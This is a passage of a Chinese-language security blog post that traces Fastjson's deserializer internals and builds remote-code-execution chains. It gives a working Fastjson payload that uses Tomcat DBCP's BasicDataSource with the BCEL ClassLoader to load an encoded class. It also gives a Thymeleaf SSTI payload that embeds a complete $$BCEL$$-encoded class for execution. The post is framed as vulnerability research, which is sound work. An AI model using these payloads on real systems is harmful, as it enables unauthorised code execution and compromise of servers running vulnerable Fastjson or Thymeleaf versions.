<span class="keyword">public</span> String name;  </span><br><span class="line">    <span class="keyword">public</span> Integer age;  </span><br><span class="line">    <span class="keyword">public</span>  <span class="keyword">static</span> Map map;  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Person</span><span class="params">()</span> &#123;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Person</span><span class="params">(String name, Integer age)</span> &#123;  </span><br><span class="line">        <span class="built_in">this</span>.name = name;  </span><br><span class="line">        <span class="built_in">this</span>.age = age;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span>  Map <span class="title function_">getMap</span><span class="params">()</span> &#123;  </span><br><span class="line">        System.out.println(<span class="string">&quot;getMap&quot;</span>);  </span><br><span class="line">        <span class="keyword">return</span> map;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getName</span><span class="params">()</span> &#123;  </span><br><span class="line">        System.out.println(<span class="string">&quot;getName&quot;</span>);  </span><br><span class="line">        <span class="keyword">return</span> name;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setName</span><span class="params">(String name)</span> <span class="keyword">throws</span> java.io.IOException &#123;  </span><br><span class="line">        System.out.println(<span class="string">&quot;setName&quot;</span>);  </span><br><span class="line">        <span class="built_in">this</span>.name = name;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> Integer <span class="title function_">getAge</span><span class="params">()</span> <span class="keyword">throws</span> java.io.IOException&#123;  </span><br><span class="line">        System.out.println(<span class="string">&quot;getAge&quot;</span>);  </span><br><span class="line">        <span class="keyword">return</span> age;  </span><br><span class="line">    &#125;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setAge</span><span class="params">(Integer age)</span> &#123;  </span><br><span class="line">        System.out.println(<span class="string">&quot;setAge&quot;</span>);  </span><br><span class="line">        <span class="built_in">this</span>.age = age;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br><span class="line">-------------------------------------------------------------------------</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">fastjsondemo</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> java.io.IOException&#123;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;com.Person\&quot;,\&quot;name\&quot;:\&quot;xxx\&quot;,\&quot;age\&quot;:\&quot;16\&quot;,\&quot;map\&quot;:&#123;&#125;&#125;&quot;</span>;  </span><br><span class="line">        <span class="type">Object</span> <span class="variable">jsonObject</span> <span class="operator">=</span> JSON.parse(s);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br><span class="line">-------------------------------------------------------------------</span><br></pre></td></tr></table></figure>

<p>Demo运行截图如下</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909140656.png"></p>
<p>不难发现其实<code>parse()</code>也可以对部分的getter进行调用，不过得满足一定的条件，我们可以对这个问题进行一些简单的探究（之前的Fastjson初探那篇文章写的不够细致）。</p>
<p>对<code>parse()</code>下个断点跟进几步，来到<code>com.alibaba.fastjson.parser.DefaultJSONParser</code>的367、368行。这里首先跟进一下367行获取反序列化器这里进行调试，在跟进前几步的时候，会先根据所传入的<code>clazz</code>对象的<code>Classtype</code>从已有的反序列化器进行选择，因为我们这里的clazz对象是自己编写的Javabean，最终会新建一个<code>JavaBeanDeserializer</code>返回给<code>deserializer</code>，我们跟进看看<code>createJavaBeanDeserializer</code> 这里。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909141537.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909142217.png"></p>
<p>把一些用处不大的if结构缩略后得到下图。关键看箭头所指的部分，我们迫切的需要代码执行到这里返回一个新建可控的<code>JavaBeanDeserializer，</code>而不是返回一个591行由asm所创建的<code>JavaBeanDeserializer</code>（asm创建的反序列化器一方面是没法调试，一方面是不会调对象的<code>getter</code>），而掌控这一切的关键则在第一个断点处的if结构里，我们展开看看。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909143007.png"></p>
<p>在539行可以看到asmEnable被赋为了false，只要执行到这里则必然能够获得自建的<code>JavaBeanDeserializer</code>。而这里与<code>beanInfo</code>的创建又是有相当密切的关系的，我们再跟进一下526的<code>JavaBeanInfo.build()</code></p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909143917.png"></p>
<p>和<code>fieldList</code>最密切相关的地方就在这三个for循环，第一个是对<code>setter</code>方法进行的添加，第二个是对<code>fields</code>属性遍历进行的添加，第三个是对<code>getter</code>方法进行的添加，因为这里牵扯到了<code>fieldInfo</code>的<code>getOnly</code>属性，我们可以先去第三个for循环的add里面瞅瞅，看看这里<code>new FieldInfo</code>的源码。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909144658.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909145152.png"></p>
<p>抛去不影响的部分，直接看看163到183行，发现这里会根据有多少个参数类型来对<code>getOnly</code>属性进行赋值，因为我们传入的是get，自然就是0，所以只要能运行到getter循环的<code>new FieldInfo</code>这里，就足以达成目的，我们重新回到getter循环那里看看运行到<code>new FieldInfo</code>的条件。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909150018.png"></p>
<p>在getter循环里假如FieldInfoList的条件如下所示，前面两张图的条件就是我们耳熟能详的那几条，但最后一张图里的条件，一般都会被默认忽视掉。在加入这个Field到FieldList之前，这个Field绝对不能在FieldList中已经存在，也就是说我们这里不允许在前两个循环就把我们的getMap调用的Field给加进到FieldList里。对于第一个循环而言，这里非常好讲，只需要对<code>map</code>属性不设置<code>set</code>方法即可，而第二个循环，则需要我们自己稍微跟一下代码。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909151835.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909151908.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909151934.png"></p>
<p>Field循环一进去的第一段代码就已经非常吸引我们的注意力了，可以发现只要将<code>map</code>设置为静态属性，Field循环直接就能给跳过去，非常的nice。这也是为什么demo里面只有<code>map</code>属性设置为<code>static</code>的根本原因。到了这一步，我们就可以保证用来进行反序列化的反序列化器是由我们自己所创建的<code>JavaBeanDeserializer</code>了，我们出栈看看<code>deserilzer.deserize()</code>的执行流程。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909151756.png"></p>
<p>跳过不重要的部分，<code>deseriazle</code>里面会对clazz的fieldList进行遍历，再根据属性自身的特性进行特定的<code>setValue</code>调用。比如现在遍历到的属性是<code>String name</code>，调用的<code>setValue</code>就是<br><code>fieldDeser.setValue</code>最终调用<code>setName</code></p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909153246.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909162520.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909162812.png"></p>
<p>而别的属性的话，就比如我们的Map，调用的就是<code>parseField(parser, key, object, type, fieldValues)</code>这里。我们可以跟进看一下，这里要稍微跳几步，直接分析<code>setValue</code>里的内容。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909163004.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909163147.png"><br><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909163235.png"></p>
<p>能够看到，在<code>setValue</code>里，会对当前的fieldInfo.getOnly属性进行判断，如果当前属性为getOnly类型，且其类型符合我们之前<code>getter</code>循环要求的类型，则在85行进行getMap的调用，到此我们实现了在<code>parse()</code>里对于<code>getter</code>方法的调用。</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909163403.png"></p>
<p>但这里的利用链显然不完善，只能调用那几个单调类型的getter是无法调用这里的<code>getConnection</code>和<code>getLogWriter</code>的，审计到了这一步，我们才来到了真正的重头戏，真正的开始引入前面所说的fastjson trick。</p>
<hr>
<p>重新审计源码，发现<code>com.alibaba.fastjson.parser.DefaultJSONParser#parseObject(java.util.Map, java.lang.Object)</code>中，如果JSONObject位于JSON的key上，就会调用key的toString方法。<br>（不用想着如何调用的问题，这个和<code>deserial()</code>那个在同一个方法里）</p>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230909164526.png"></p>
<p>JSONObject是Map的子类，在执行toString() 时会将提取类中所有的Field，自然会执行相应的 getter 方法，从某些方面来讲，这也是<code>toString</code>链和<code>getter</code>联系紧密的一部分原因。</p>
<p>换句话说，只要我们把这里的key设置为了<code>JSONObject</code>对象，然后把这个<code>BasicDataSource</code>对象成<code>JSONObject</code>对象的其中一个的key，就会直接调用<code>JSONObject</code>的所有getter方法，形成闭环（适用范围还挺广的，可以记一下）。</p>
<p>Demo如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">--------------------------------------------------------------------------------</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">fastjson_dbcp</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception&#123;  </span><br><span class="line">        <span class="type">JavaClass</span> <span class="variable">cls</span> <span class="operator">=</span> Repository.lookupClass(calc.class);  </span><br><span class="line">        <span class="comment">//System.out.println(Arrays.toString(cls.getBytes()));  </span></span><br><span class="line">        <span class="type">String</span> <span class="variable">code</span> <span class="operator">=</span> Utility.encode(cls.getBytes(), <span class="literal">true</span>);<span class="comment">//转换为字节码并编码为bcel字节码  </span></span><br><span class="line">        System.out.println(code);</span><br><span class="line">        <span class="type">String</span> <span class="variable">poc</span> <span class="operator">=</span> <span class="string">&quot;&#123;&#123;&#123;\&quot;aaa\&quot;:&#123;\&quot;@type\&quot;:\&quot;org.apache.tomcat.dbcp.dbcp2.BasicDataSource\&quot;, \&quot;driverClassLoader\&quot;:&#123;\&quot;@type\&quot;:\&quot;com.sun.org.apache.bcel.internal.util.ClassLoader\&quot;&#125;,\&quot;driverClassName\&quot;: \&quot;$$BCEL$$&quot;</span>+code+<span class="string">&quot;\&quot;&#125;&#125;:\&quot;bbb\&quot;&#125;:\&quot;ccc\&quot;&#125;&quot;</span>;  </span><br><span class="line">		System.out.println(poc);  </span><br><span class="line">		JSON.parse(poc);</span><br><span class="line">		&#125;</span><br><span class="line">&#125;</span><br><span class="line">----------------------------------------------------------------------------</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">fastjsondemo</span> &#123;  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> java.io.IOException&#123;  </span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;com.Person\&quot;,\&quot;name\&quot;:\&quot;admin\&quot;,\&quot;age\&quot;:\&quot;16\&quot;,\&quot;map\&quot;:&#123;&#125;&#125;&quot;</span>;  </span><br><span class="line">        <span class="type">Object</span> <span class="variable">jsonObject</span> <span class="operator">=</span> JSON.parse(s);  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();  </span><br><span class="line">        person.setAge(<span class="number">11</span>);  </span><br><span class="line">        person.setName(<span class="string">&quot;A&quot;</span>);  </span><br><span class="line">        System.out.println(person);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;</span><br><span class="line">----------------------------------------------------------------------------</span><br></pre></td></tr></table></figure>
<p><img src="https://hexo--blog--images.oss-cn-beijing.aliyuncs.com/BCEL%20ClassLoader/Pasted%20image%2020230910013238.png"></p>
<hr>
<h4 id="Thymeleaf与BCEL"><a href="#Thymeleaf与BCEL" class="headerlink" title="Thymeleaf与BCEL"></a>Thymeleaf与BCEL</h4><p><code>pom.xml</code></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span>  </span><br><span class="line">           <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework.boot<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span>  </span><br><span class="line">           <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-boot-starter-thymeleaf<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里和上面Fastjson差不多，真正的关键在于Thymeleaf这里，这就需要我们自己了解一下Thymeleaf SSTI的知识，这里不多赘述了，详情可以看我另外一篇文章，要求Thymeleaf &lt; 3.0.2 的</p>
<p>咱们直接上POC</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">::__$&#123;<span class="string">&quot;&quot;</span>.getClass().forName(<span class="string">&quot;$$BCEL$$$l$8b$I$A$A$A$A$A$A$AePMO$c2$40$U$9c$85B$a1$W$84$e2$f7$b7$t$c1$83$3dx$c4x1z$b1$w$R$83$e7$ed$b2$c1$c5$d2$92R$8c$fe$o$cf$5e$d4x$f0$H$f8$a3$8c$af$x$R$a3$7bx$_o$e6$cdL$de$7e$7c$be$bd$D$d8$c7$b6$F$Ts$W$e6$b1P$c0b$da$97L$y$9bX1$b1$ca$90$3fP$a1J$O$Z$b2$f5F$87$c18$8a$ba$92a$d6S$a1$3c$l$P$7c$Z_q$3f$m$c4$f1$o$c1$83$O$8fU$3aO$40$p$b9Q$a3$94$T$d1$c0$f5$a5$I$dc$W$7f$I$o$dem2$U$OD0$b1$$$b5$T$$n$cf$f8P$cb$u$9c$c1jG$e3X$c8$T$95$da$d8$T$d5$5e$9f$dfq$h$F$UM$ac$d9X$c7$GEP$aa$b0$b1$89$z$86Z$ca$bb$B$P$7b$ee$f1$bd$90$c3DE$nC$e5o8A$d3$c5$L$bf$_E$c2P$9dB$97$e30Q$D$ca$b5z2$f9$Z$e6$eb$N$ef$df$O$dda$c8$7b$v$Yv$ea$bf$d8v$S$ab$b0$d7$fc$zh$c5$91$90$a3Q$T$db$c8$d3$7f$a7$_$D$96$deB$d5$a2$c9$a5$ce$a8$e7v_$c0$9e4$3dC5$af$c1$Ml$aa$f6$f7$CJ$uS$_$60$f6G$7c$a1$cd$80$f2$x2N$f6$Z$c6$f5$p$8c$d3$t$8d$VI$97CV$bb90$a8$9a$84YH$3f$b2D$a8$ad$fd$81$8af2$9e$89$wH$e8h$b8$f6$Fz7$85$d0$t$C$A$A&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;&quot;</span>.getClass().forName(<span class="string">&quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span>).newInstance())&#125;_______________</span><br></pre></td></tr></table></figure>


        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2023/09/12/%E6%9C%80%E8%BF%91%E7%9A%84%E7%94%9F%E6%B4%BB/"
      title="最近的生活"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        最近的生活
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2023/09/12/Thymeleaf%20SSTI/"
      title="Thymeleaf与SSTI"
     >

    <p class="title-text">
      
        Thymeleaf与SSTI
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 F4miti0n<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
